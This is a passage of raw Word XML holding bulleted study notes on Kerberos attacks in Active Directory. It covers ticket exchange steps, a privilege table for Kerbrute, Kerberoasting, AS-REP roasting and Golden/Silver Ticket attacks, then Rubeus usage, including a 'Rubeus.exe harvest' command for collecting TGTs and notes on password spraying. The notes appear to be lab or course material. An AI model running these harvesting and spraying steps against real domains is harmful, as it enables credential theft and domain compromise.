        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS-REP – KDC verifies client and sends back encrypted TGT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEAE0ED" w14:textId="69FAF520" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TGS-REQ – client sends encrypted TGT to TGS with SPN of service clients wants access to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9ACF13" w14:textId="0CA29527" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>TGS-REP – KDC verifies TGT of user and user has access to service, then sends valid session key for the service to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440AA65" w14:textId="0814F1E4" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AP-REQ – client requests the service and sends the valid session key to prove the user has access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26905D4B" w14:textId="0CA8B8CA" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AP-REP – service grants access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5D5BB" w14:textId="79B17D66" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberos Tickets Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29249F4D" w14:textId="723400F7" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>main ticket is a ticket granting ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50160189" w14:textId="42CFDD30" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kirbi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B654CDC" w14:textId="6403C950" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ccache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="004EEB31" w14:textId="17E830EA" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>typically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> base64 and used for various attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A94891" w14:textId="2DB2F179" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>KRBTGT allows user to get any service ticket, allowing access to anything on domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E678C3" w14:textId="60EA2806" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attack Privilege Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E6073" w14:textId="4DFC941C" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Enumeration – no domain access required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5AFDEB" w14:textId="0C0DCEFD" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pass the Ticket – access as a user to the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA8479" w14:textId="7C11A5DD" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – access as any user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14FC28" w14:textId="7862E04A" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS-REP Roasting – access as any user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044366E8" w14:textId="45FE09AC" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Golden Ticket – Full domain compromise (admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5EDDE" w14:textId="0FDCB485" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Silver Ticket – Service hash required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21061DC5" w14:textId="01495D23" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Skeleton Key – Full domain compromise (admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686C0F5" w14:textId="07143149" w:rsidR="001E57A4" w:rsidRPr="0084205E" w:rsidRDefault="001E57A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Enumeration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CB35F9D" w14:textId="34D61C05" w:rsidR="001E57A4" w:rsidRPr="0084205E" w:rsidRDefault="001E57A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>By brute-forcing Kerberos pre-authentication, “account failed to log on” event is not triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FDC908" w14:textId="621700D4" w:rsidR="001E57A4" w:rsidRPr="0084205E" w:rsidRDefault="001E57A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute-forcing can only be done by sending a single UDP frame to the KDC allowing user to enumerate domain users from a wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787ACDE" w14:textId="03982033" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>see syntax above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1803C3" w14:textId="4B1935EC" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Harvesting and Brute-Forcing Tickets with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136895C" w14:textId="15E9424E" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>powerful tool for attacking Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A15F3D" w14:textId="3AD3987F" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">adaptation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kekeo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3561BF99" w14:textId="37402FEE" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>overpass the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED53A5" w14:textId="72103B01" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ticket requests and renewals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A298164" w14:textId="5510300B" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ticket management, extraction, harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690FEFAF" w14:textId="2C39CAA2" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>pass the ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F750E" w14:textId="27DDD9ED" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS-REP Roasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE2AB3" w14:textId="604FDD44" w:rsidR="00E9343A" w:rsidRPr="0084205E" w:rsidRDefault="00E9343A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72E86A51" w14:textId="791B94B4" w:rsidR="000B378D" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="000B378D" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/GhostPack/Rubeus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F4D74A6" w14:textId="246C868C" w:rsidR="000B378D" w:rsidRPr="0084205E" w:rsidRDefault="000B378D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>On targeted machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727266E6" w14:textId="0FF5B258" w:rsidR="000B378D" w:rsidRPr="0084205E" w:rsidRDefault="000B378D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>find Rubeus executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC794C9" w14:textId="1326F954" w:rsidR="000B378D" w:rsidRPr="0084205E" w:rsidRDefault="000B378D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>harvest  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>interval:30 – Rubeus harvests for TGTs every 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5937B433" w14:textId="1355AD67" w:rsidR="000B378D" w:rsidRPr="0084205E" w:rsidRDefault="000B378D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute-Forcing/Password-Spraying with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA13A5" w14:textId="32914591" w:rsidR="000B378D" w:rsidRPr="0084205E" w:rsidRDefault="000B378D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>single user account and wordlist of passwords to see which works for given account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A268766" w14:textId="19C933A8" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Take given Kerberos-based password and spray it against all found users and return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kirbi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF6C00" w14:textId="1D2300F0" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">TGT ticket that can be used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> get service tickets from KDC as well as be used in attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7ADCF" w14:textId="4CC54563" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>pass the ticket attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4703D75B" w14:textId="0B07C3E6" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>add IP and domain name to hosts file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F3003B" w14:textId="33C36FB8" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">syntax echo &lt;target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; &lt;domain&gt; &gt;&gt; &lt;PATH&gt;</w:t>
      </w:r>
    </w:p>
